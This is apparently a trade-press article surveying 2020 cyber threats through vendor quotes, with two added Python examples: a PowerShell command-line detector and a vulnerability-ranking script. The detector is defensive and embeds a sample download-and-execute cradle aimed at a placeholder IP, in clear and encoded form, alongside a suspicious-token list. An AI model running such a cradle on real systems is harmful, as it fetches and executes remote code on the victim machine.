Companies in every industry and of all sizes are finding themselves under an increasing barrage of cyberattacks. At the same time, the threat landscape is evolving, becoming more sophisticated and doing so at a faster pace than many organisations are able to keep up with.
The days are gone when a firewall alone was sufficient protection against a cybercriminal or group. The proliferation of connected devices, alongside flexible working practices and complex partner ecosystems, has made the boundaries of an organisation ebb and flow. Threat actors are taking advantage of this at an eye-wateringly large cost to businesses.
A number of threats are evolving more quickly than others, but which are the ones businesses need to be especially aware of today?
Attacks Are Getting Tactical and Targeted
While COVID-19 continues to drive cybersecurity trends as a whole, it has also inspired new attacks that capitalise on our desire for news, assistance or guidelines that could help keep us safe. While global malware volume dipped in the first half of 2020, new and more measured attacks, including ransomware, shifted the balance of the cyber war. Amid the disruption, a few key takeaways emerge: malware is down, but it is changing and spreading. Less malware does not necessarily mean a safer world.
Mohamed Abdallah, the Regional Director for Middle East, Turkey and Africa at SonicWall, explains, “Across all categories of malware, SonicWall researchers have noted that attacks are both more tactical and more targeted than ever, giving them a greater chance of success. The malware that we are seeing is evolving to be sneakier and more malicious. As detection tools are refined, hackers are increasingly turning to fileless malware attacks that operate in memory and take advantage of legitimate tools such as Microsoft Windows Powershell.”
According to Abdallah, ransomware is up, particularly in the U.S. (+109%). “Office files continue to be leveraged for malicious agendas. SonicWall Capture Advanced Threat Protection (ATP) with Real-Time Deep Memory Inspection is catching more attacks than ever. Malware targeting Internet of Things (IoT) devices has risen to 20.2 million, up 50% from this time last year. Cybercriminals are increasingly targeting the massive influx of employees working from home. And intrusion attempts are up 19%, to 2.3 trillion.”
Mobile phones are also becoming a focal point for nation states and rogue hacking groups. Traditionally, attackers have targeted mobile phones to take data, to surveil users and to track their location. “We’ve seen the transition by attackers to using the mobile phone as the penetration vector into the organizational network. That being said, there hasn’t been an influx of new techniques introduced into the industry for penetration — we primarily see phishing emails at the top of most threat actors’ lists,” says Israel Barak, the Chief Information Security Officer at Cybereason.
Cyber crime actors continue to prey on victims using COVID-19 themed attacks. “Recently, we’ve seen attackers use fake apps that claim to offer continuous monitoring of the infection rates in a city or country. Or in one instance, a scam was being run with employees at one company receiving text messages appearing to come from the company’s administrators with an update on what the company is doing in response to the pandemic. Employees will click on the links contained in the text messages leading them to fraudulent websites,” adds Barak.
According to Derek Manky, the Chief of Security Insights and Global Threat Alliances, at Fortinet, the potential attack surface of organizations continues to expand, and the speed and sophistication of cyberattacks continue to make defending the network ever more challenging. “With IT teams on constant alert, and much of their time spent putting out fires, it can be difficult for organizations to pause and look at the big picture. Most breaches today are driven by cybercriminals who steal sensitive information to sell on the Dark Web, or encrypt systems and ask for a ransom,” he says.
Manky further adds that as a result, hacking has become much more sophisticated and lethal. For example, more than half of all attacks are managed by cybercrime organizations that are better organized than most companies. “They approach their work like any business, except that their revenue streams are stolen data and extortion. Their new Cybercrime-as-a-Service ecosystem is one of the biggest reasons why the cybercrime industry grows dramatically and generates more than one trillion dollars in revenue every year,” he says.
Last year, various states in the Middle East including UAE, Saudi Arabia, Oman, Jordan, and Turkey attracted a large number of inbound attacks. “Cyberattack patterns remain more or less the same for this year, but we are seeing a surge of new attacks that are designed to exploit the uncertainty and anxiety around the COVID-19 pandemic. With the spread of the pandemic, many enterprises have adopted remote working. While the security analysts are working on scaling up organization-wide security frameworks to maintain users’ trust and handle multiple remote endpoints, cloud integrity, online identity verification, data security and more, hackers are nefariously exploiting the remote work platform to launch attacks,” says Subhalakshmi Ganapathy, Product Evangelist, ManageEngine.
From keyloggers, stealers and remote access trojans (RATs) to sophisticated advanced persistent threat (APT) groups such as Chafer and living-off-the-land tactics, attackers are employing every technique available to break the defensive security of enterprises. They are using newer forms of existing malware (such as Emotet) and new malware strains to beat cyber defence systems.
During the COVID-19 pandemic, the global community faced, and is still facing, new challenges that could not have been anticipated. “Lockdowns made most businesses operate remotely through the business’ network. Through that, we witnessed a heavy reliance on remote access systems which is making businesses more susceptible to malware, ransomware and phishing attacks. This has created a challenge for businesses due to the data theft, ransomware attacks, and data breaches they have faced during COVID-19,” explains Tamer Odeh, Regional Director at SentinelOne in the Middle East.
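Abdallah's remark above about fileless attacks that run in memory through Windows PowerShell, and the living-off-the-land tactics mentioned in the previous paragraph, both come down to the same detection problem: the binary is legitimate, so the command line and its payload are what give the attack away. The following is an added example written for this article, not code from SonicWall, ManageEngine or any other vendor quoted here. It decodes the `-EncodedCommand` form (base64 of UTF-16LE text), strips the base64 blob so that random substrings in it cannot trigger matches, and scores the visible command plus the decoded payload against a small indicator list. The sample command lines, the indicator list and the scoring threshold are constructed assumptions for illustration; 203.0.113.5 is a documentation address.

```python
"""Flag PowerShell command lines with the hallmarks of fileless, living-off-the-land
execution: encoded commands, download cradles and in-memory invocation.

Added example for this article; not code from SonicWall, ManageEngine or any other
vendor quoted here. Sample command lines are constructed; the IP 203.0.113.5 is a
documentation address and the token list is an illustrative assumption."""
import base64
import re
from typing import List, Optional, Tuple

# Indicators typical of download cradles and in-memory execution (assumption: an
# illustrative list, not an authoritative signature set). "-nop" also catches "-noprofile".
SUSPICIOUS_TOKENS = [
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
    "reflection.assembly", "-nop", "hidden", "bypass",
]

# -EncodedCommand and its documented abbreviations, followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: treat as not decodable rather than crash


def score_powershell(cmdline: str) -> Tuple[int, List[str]]:
    """Count indicator hits on the command line plus its decoded payload.

    The base64 blob is replaced before token matching so that random base64
    substrings (e.g. 'iex') cannot produce false hits."""
    hits: List[str] = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encodedcommand")
    visible = ENC_FLAG.sub("-encodedcommand", cmdline)
    text = (visible + " " + (decoded or "")).lower()
    hits.extend(tok for tok in SUSPICIOUS_TOKENS if tok in text)
    return len(hits), hits


def triage(cmdlines: List[str], threshold: int = 3) -> List[Tuple[int, str]]:
    """Return (score, cmdline) for lines at or above the alert threshold, highest first."""
    scored = [(score_powershell(c)[0], c) for c in cmdlines]
    return sorted(((s, c) for s, c in scored if s >= threshold), reverse=True)


# Constructed samples (not captured from any real incident).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED_LINE = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
    SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
CLEAR_LINE = "powershell -nop -w hidden -c \"" + SAMPLE_PAYLOAD + "\""
BENIGN_LINE = "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"

if __name__ == "__main__":
    for score, line in triage([ENCODED_LINE, CLEAR_LINE, BENIGN_LINE]):
        print(score, line[:80])
```

In production this logic would run over process-creation telemetry or PowerShell script block logs rather than a hand-built list, and the indicator set would be tuned against the environment's own baseline of administrative scripts, but the two design points carry over: always decode before matching, and never match against the raw base64.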
The threat landscape today has largely stabilized. With a few exceptions, the most prominent threats and their delivery methods have been consistent for the past couple of years. “It consists of nation-state attackers, highly skilled cybercrime organizations, and low-skill opportunistic groups and individuals. The nation-state attackers are the most difficult to defend against, if it’s even possible. They are extremely highly skilled, endlessly patient and enjoy limitless resources,” asserts John Shier, Senior Security Advisor, Sophos.
“We can however learn from their past tactics and tooling which ultimately end up in the hands of organized cybercrime. This group is almost exclusively financially motivated and is responsible for a majority of the threats we encounter. Many of them are highly skilled and well-funded. They are continually looking for the next edge in defeating our defenses. Both tech and humans. They operate botnets and create most of the malware in the wild. The low-skilled, opportunistic criminals contribute to the rest of the noise and distraction in the threat landscape. They rely mostly on automation and older, over-used, and detectable tools,” he continues.
Today’s digital environment is ever-changing. Different types of assets constantly enter and exit the enterprise, and some are ephemeral – lasting mere seconds or minutes. Another element adding to what is already a complex situation is security teams being tasked to secure operational technology (OT). “According to a commissioned study conducted by Forrester Consulting, on behalf of Tenable, 61% of Saudi organizations who had suffered a business-impacting cyber attack in the last 12 months said these attacks involved their operational technology (OT) systems,” says Maher Jadallah, Regional Director – Middle East, Tenable.
According to Jadallah, in tandem, the number of vulnerabilities present in hardware and software is also rising, and the severity of each is increasing. The result is that security teams have hundreds of vulnerabilities to sift through and, even when prioritising by criticality, still far more than they can possibly handle.
“Another trend that we see increasing is organizations opening up their networks and systems to third party suppliers in an effort to improve functionality and collaboration. The ramification is that, if a supplier is breached, the attacker might be able to traverse across to other connected networks and systems. This may cause direct operational and reputational harm to all persons and companies connected to the infected provider. Network segmentation and the isolation of privileged accounts can minimise damage caused by a third party supplier breach,” adds Jadallah.
Cyber Threats Moving Beyond Ransomware
Although ransomware attacks remain popular among cybercriminals, there are plenty of other attack vectors these adversaries use to compromise enterprises and entrench themselves inside them. “What we have been seeing as a result of the current pandemic are a few things,” adds Christopher Hills, the Deputy CTO of BeyondTrust. “Enterprises that are having to embrace remote working are now faced with a flood of helpdesk tickets. As a result, some enterprises are relaxing policies on endpoints and giving employees more administrator rights to help relieve some of the helpdesk tickets. This, in some cases, is causing an uptick in anxiety levels.”
Hills further adds that a BYOD (Bring Your Own Device) approach for corporate resource access is another cause for concern. “More personal devices connecting to these corporate resources means more pressure on IT teams to control Anti-Virus, OS Patch Level, and other software, to ensure they are secure and without vulnerabilities that could allow cyber criminals to compromise these personal assets and use them as a conduit to gain access to the corporate resources,” he says.
Manky further adds, “One of the most lethal combinations is a sophisticated attack that targets humans when they are in a state of fear, uncertainty, and doubt. The current COVID-19 pandemic is a great example. The internet enables most people to do their own research, and sophisticated attackers are ahead of the curve. They have anticipated the generic behavior of individuals and prepared their campaigns for the events around us by stuffing the internet, and our inboxes, with disinformation, malicious files, and links to infected web pages.”
According to Manky, “Ironically, we now live in a world where human viruses and cyber viruses cross attack paths. This is extremely effective, generating a lot of money while causing a tremendous amount of physical and monetary damage. It is very likely that we will see more game-changing vulnerabilities like Spectre, Meltdown, BlueBorne, and Broadpwn. Without true visibility and control over everything in their infrastructure, organizations will miss these threats when they breach their networks.”
Haider Pasha, Senior Director and Chief Security Officer at Palo Alto Networks, Middle East and Africa (MEA), says, “Given that more of the workforce is working remotely, we anticipate an increase in attackers targeting home routers and IoT devices, especially since 98% of all IoT device traffic is unencrypted. For better precaution, consumers should ensure their physical router is not using the default password and must create a unique password for both their routers and all physical devices. Moreover, as some economies may go into recessions with unemployment numbers on the rise in some sectors, some individuals might turn to cybercrime – which typically happens in economic downturns.”
Preparing to Face Cyber Threats
Cybercriminals are preying on the current landscape and the opportunity it presents. They know that, now more than ever, people, businesses and corporations are all having to adjust to working more “remotely.” This is opening up new avenues for attack that they might not have previously considered.
“It seems that banking institutions are the bigger targets, and while the Emotet malware has become popular again since first emerging in 2014, we are seeing cybercriminals step up their attacks on wire transfers. Cybercriminals are tactically attacking wire transfers and doing various things to intercept these transfers for their personal gain,” explains Hills. “The key to success is to remain proactive, not reactive. Continue maturing policies, procedures, software, and solutions. Think about compromise to your organization or enterprise from a cyber criminal’s perspective and focus on those areas first.”
Know yourself and know your enemy is the best advice. “Knowing yourself is understanding how your business operates on all levels, from the operational to the executive, knowing how systems interact, how people interact and building your defenses around these specific interactions between company assets. Knowing your enemy is also crucial; threats evolve almost every other day and staying on top of the latest developments will surely make you more aware and capable of fighting off these threats when they target you,” Manky adds.
Attacks are evolving. Their goals are no longer limited to stealing financial information or bringing the business to a standstill through resource abuse. “The goals are changing and so are the motives. Previously, the hackers were predominantly financially motivated. Now, most of the attacks have political and espionage motives. They are harvesting email or user account credentials so that they can target the cybersecurity posture of the company rather than exploiting loopholes and vulnerabilities. The damage in such cases is unimaginable,” adds Ganapathy.
Despite the growing frequency of attacks and increasing board-level awareness of common threats, many organizations are still failing to implement effective cyber defence strategies. Training is often inadequate and end-user awareness, often poor. “A new approach is required. One that puts people at the heart of cyber defence – ensuring employees are not just able to spot and deter attacks but are acutely aware of their role in keeping our organizations safe,” says Emile Abou Saleh, Regional Director, Middle East and Africa at Proofpoint.
According to Odeh, AI can help us overcome this challenge faster and handle issues that are new to us in a more informed manner. “Whether organizations are mostly working from home or starting to go back to offices, the need for AI-powered technology that helps improve cybersecurity teams is essential. In order to defend businesses that embrace digital transformation and adopt IoT, cloud and more, organizations need dynamic artificial intelligence-driven (AI) next-generation endpoint protection platforms that defend every endpoint against all types of attacks, at every stage in the threat lifecycle without the need for human intervention,” he says.
Handling Security Challenges
Businesses spend countless dollars each year trying to protect themselves from various attack vectors that cyber criminals will use to breach them. According to Hills, what is interesting is that each company will have a unique approach depending on three major factors – Risk Tolerance, Risk Acceptance and Risk Appetite. “Having these items clearly defined and documented, is a great step. These should be the foundation of your security framework. Once these are documented, you can better approach the question of, “Am I prepared for the compromise.” If you can’t answer that question with a “Yes,” then you still have work to do,” he adds.
Hills adds that as a company, BeyondTrust tries to be as transparent as possible with its customers, by both sharing its experience and market trends, which drive decisions. “As a company, we continue to improve and mature our overall security posture, processes and programs. We continue to evaluate the cyber landscape and collaborate with our partners to enhance and mature our integrations so that our overall offering can lend itself better to suit each and every customer’s unique security requirements,” he says.
Meanwhile, Abdallah says that his company has recently introduced the new Boundless Cybersecurity model, designed to help organizations navigate a hyper-distributed IT reality where everyone is remote, everyone is mobile, and everyone is less secure. “By knowing the unknown, providing real-time visibility and leveraging breakthrough economics, SonicWall enables businesses to close the cybersecurity business gap and guard against the growing ranks of opportunistic cyber attackers. By gaining a fuller understanding about where we find ourselves in 2020, we can move as safely and resolutely as possible toward the future, whatever it has in store,” he explains.
The good guys or defenders are constantly facing cyber risks and attacks from well-funded and motivated hackers. “Our advice to customers, partners and the wider industry includes three things. You need to increase employee awareness of COVID-19 related scams. We understand that employees are more susceptible today to scams. Provide more training and awareness on some of the common techniques. And notify staff on how you as an employer will contact them in time of need — they should only use agreed upon forms of communications,” says Barak.
“As employers maintain work from home policies, there continues to be a massive increase in the use of personal mobile and company owned mobile devices. We help our customers and partners build a higher fence so that the phone is better protected by scanning and detecting malicious content that is delivered to the device, via channels such as text messages, instant messages, phishing emails and the like,” says Barak. “We also need to adopt a post breach mindset and realize that sometimes attacks will be successful. We need to have the infrastructure to protect in real time, and correlate the different parts of the attack — i.e. this attack started on a mobile phone and then moved into the corporate network — and then have the ability to remove the threat from the network.”
Pasha advises his customers and partners on various tactics related to being mindful about their security practices. “For customers, we strongly advise to think before you click on any links, and one should confirm that emails are from a trusted source. We also advise to be cautious about what to share on social platforms, as it is quite easy to unlock accounts by using personal details such as hometown or birthdays if available on public domains,” he says. “It is always advised to implement security measures as early as possible, stay alert and be aware of your security and privacy settings – for example, do not use the same password across multiple accounts. Our advice to enterprises is educate your workforce by running phishing simulations and social engineering training for employees. We must also be mindful on limiting audit access and using multi-factor authentication.”
Irrespective of the means of attack – email, cloud applications, the web, social media – today’s threats target people, not infrastructure. So, while technical solutions and controls remain crucial in building a robust cyber defence, they are just one aspect of a broad and deep barrier against the latest threats. “It is therefore crucial to have in place an approach that puts people at the heart of cyber defence – ensuring employees are not just able to spot and deter attacks but are acutely aware of their role in keeping our organisations safe. This is only possible when their training goes beyond general awareness of common threats and they have a better understanding of how their behaviour can be the difference between a successful attempt and a successful attack,” explains Abou Saleh.
According to Gopan Sivasankaran, the Senior Manager, Solutioning META at Secureworks, user education is extremely important considering the entry vectors. “Also, it’s vital for organizations to adopt security solutions that take a deliberate and highly targeted approach to machine learning and other data science techniques, which is exactly what Secureworks does. By pairing incident response experience and threat research with supervised and unsupervised machine and deep learning algorithms, the Red Cloak TDR analytics software can detect unknown threats by identifying behavioural clues. The algorithms are trained on data from our entire customer base, which further increases the accuracy of the software,” says Sivasankaran.
Security awareness and training are the most important skills these days, not just for IT teams but across the organization. “It is important that all of us remain aware of what is going on and understand our PC environment better. At some point in time, experts may be needed to identify and isolate issues. Having a security policy is like having life insurance. You need it, or else the risk of being a prey is far greater,” says Rohit Bhargava, Practice Head – Cloud & Security, Cloud Box Technologies.
Bhargava further adds that, as Microsoft has stopped supporting certain OS versions, it is important to protect information assets by running a current OS and genuine applications on PCs. “Social engineering hacks are paving their way and it is imperative to have a stronger password protection policy to ensure personal information is not accessible to attackers. We always recommend that our SMB and enterprise clients create IT policies that highlight security awareness, offer security health checks and look for local partners with local expertise to offer managed protection and service to ensure higher levels of protection,” he says.
Shier says that doing security right is difficult. “That’s why we always say there’s no ‘silver bullet‘ in security. A good start, however, is building a solid security foundation. This includes having the right people, processes and tools in place to give you a fighting chance. A robust security culture ensures everyone is ‘on duty‘ when it comes to protecting the enterprise. Clear, easy-to-follow, and conservative processes will prevent simple mistakes from harming your business. Using the very latest prevention and protection technologies will defend your organization against attackers when the first two fail. Taken together, these three are just a starting point on the never-ending road to a mature security program,” he says.
Organisations should focus on the basics first to stop the majority of threats they will face. This means complete and live visibility into the entirety of their attack surface — be they IT or OT, traditional on-prem or in the cloud — as the first step toward reducing overall cyber risk. “Security solutions must ingest threat data, such as in-the-wild exploitation of a specific vulnerability, then use that information to discern which vulnerabilities should be addressed immediately in order to seal off attack entry points,” adds Jadallah. “Once basic asset management and vulnerability management is in place, you can then monitor the environment for anything that deviates from the norm – be it network anomalies or policy violations, or changes to the actual runtime configuration of a device like a Programmable Logic Controller (PLC) in an OT installation in a factory or plant.”
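Jadallah's point that solutions must ingest threat data such as in-the-wild exploitation and use it to decide what gets fixed first is easy to state and easy to get wrong, because a plain CVSS sort buries an actively exploited medium-severity bug under a pile of unexploited criticals. The following is an added example written for this article, not Tenable's or any other vendor's code. It ranks findings by severity plus an exploitation feed and asset context (internet exposure, OT placement), and separates out the "address immediately" bucket. Asset names, the V-1001 style vulnerability IDs, the exploitation feed and the weights are all constructed assumptions.

```python
"""Rank vulnerabilities using severity plus threat intelligence and asset context,
so the 'fix immediately' bucket is driven by evidence of exploitation rather than
CVSS alone.

Added example for this article; not Tenable's or the article's own code. Asset names,
vulnerability IDs (V-1001 ...), the exploitation feed and the weights are constructed."""
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str
    cvss: float            # base severity, 0.0-10.0
    internet_facing: bool  # reachable from untrusted networks
    asset_class: str       # "IT" or "OT"


# Constructed threat feed: vulnerability IDs with in-the-wild exploitation reports.
EXPLOITED_IN_WILD: FrozenSet[str] = frozenset({"V-1003", "V-1005"})

# Weights are assumptions for illustration; tune them to your own risk appetite.
EXPLOITED_BONUS = 10.0   # exceeds the CVSS range so exploitation always outranks it
EXPOSED_BONUS = 2.0
OT_BONUS = 1.0


def priority(f: Finding, exploited: FrozenSet[str] = EXPLOITED_IN_WILD) -> float:
    """Higher means fix sooner."""
    score = f.cvss
    if f.vuln_id in exploited:
        score += EXPLOITED_BONUS
    if f.internet_facing:
        score += EXPOSED_BONUS
    if f.asset_class == "OT":
        score += OT_BONUS
    return score


def rank(findings: Iterable[Finding],
         exploited: FrozenSet[str] = EXPLOITED_IN_WILD) -> List[Finding]:
    """Full worklist, highest priority first."""
    return sorted(findings, key=lambda f: priority(f, exploited), reverse=True)


def fix_now(findings: Iterable[Finding],
            exploited: FrozenSet[str] = EXPLOITED_IN_WILD) -> List[Finding]:
    """Address immediately: exploited in the wild, or critical and internet-facing."""
    return [f for f in findings
            if f.vuln_id in exploited or (f.cvss >= 9.0 and f.internet_facing)]


# Constructed inventory: mixed IT and OT assets with differing exposure.
FINDINGS = [
    Finding("web-01", "V-1001", 9.8, True, "IT"),
    Finding("file-02", "V-1002", 9.1, False, "IT"),
    Finding("plc-07", "V-1003", 6.5, False, "OT"),
    Finding("print-09", "V-1004", 4.3, False, "IT"),
    Finding("hmi-03", "V-1005", 7.2, True, "OT"),
]

if __name__ == "__main__":
    urgent = fix_now(FINDINGS)
    for f in rank(FINDINGS):
        flag = "FIX NOW" if f in urgent else ""
        print(f"{priority(f):5.1f} {f.asset:9} {f.vuln_id} cvss={f.cvss} {flag}")
```

Run with the exploitation feed, the CVSS 7.2 bug on the internet-facing HMI and the CVSS 6.5 bug on the PLC come out ahead of the unexploited 9.1 on an internal file server; run with an empty feed, the order collapses back to severity and exposure alone, which is exactly the gap the threat data is meant to close.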
While it might seem like a luxury, taking the time to stop and think about the actor behind these attacks is vital. Enterprises need to start looking at cyberattacks and other security threats from the adversary’s perspective to understand which attacks are more attractive and lucrative for the actors and to know how best to protect against them.
For businesses that do not recognise that the threat landscape is evolving, problems will persist and they will fall further behind attackers. Organisations need to act now to ensure their cybersecurity strategies, and those of the enterprises within their supply chain, are up to date and able to respond quickly to new forms of attack. Only then can they stay safe against the ever-evolving threat landscape.